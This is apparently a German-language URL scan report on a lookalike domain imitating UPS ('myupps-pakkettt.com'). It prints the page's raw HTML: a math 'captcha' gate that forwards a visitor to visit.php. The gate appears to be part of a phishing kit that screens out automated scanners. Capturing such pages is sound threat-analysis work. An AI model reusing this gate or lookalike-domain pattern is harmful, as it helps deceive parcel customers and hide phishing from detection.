- Scan-ID:
- fc7f3c49-a1b0-4c13-999e-a73e30755a18Beendet
- Eingereichte URL:
- https://myupps-pakkettt.com/upsUmgeleitet
- Bericht beendet:
Links · 0 gefunden
Die von der Seite ausgehenden identifizierten Links
JavaScript-Variablen · 5 gefunden
Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind
Name | Typ |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
generateCaptcha | function |
verifyCaptcha | function |
Konsolenprotokoll-Meldungen · 0 gefunden
In der Web-Konsole protokollierte Meldungen
HTML
Der HTML-Rohtext der Seite
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Font Google -->
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700;800&display=swap" rel="stylesheet">
<link rel="icon" type="image/png" href="https://cdn-icons-png.flaticon.com/512/4201/4201973.png">
<link rel="stylesheet" href="./panel/css/captcha.css">
<title>Verification</title>
</head>
<body>
<div class="content">
<div class="captcha-container">
<div class="logo">
<img src="./panel/img/logo-captcha-calc.svg" alt="">
</div>
<p>
Please answer this simple math calculation to confirm that you are a human and not a robot.
</p>
<div class="captcha-text" id="captchaOperation">7 + 9 = ?</div>
<div class="p-i-a-btn">
<input type="tel" id="captchaInput" class="captcha-input" placeholder="Enter the result">
<button class="verify-btn" onclick="verifyCaptcha()">Checking Result</button>
</div>
<div id="resultMessage" class="result"></div>
</div>
</div>
<script>
const captchaInput=document.getElementById("captchaInput");captchaInput.addEventListener("input",function(){this.value=this.value.replace(/[^0-9]/g,"")});let num1,num2;function generateCaptcha(){num1=Math.floor(10*Math.random())+1,num2=Math.floor(10*Math.random())+1,document.getElementById("captchaOperation").innerText=`${num1} + ${num2} = ?`,document.getElementById("captchaInput").value=""}function verifyCaptcha(){let e=parseInt(document.getElementById("captchaInput").value),t=document.getElementById("resultMessage");e===num1+num2?window.location.href="visit.php":(t.style.color="red",t.innerText="Incorrect, please try again.",generateCaptcha())}window.onload=generateCaptcha;
</script>
</body></html>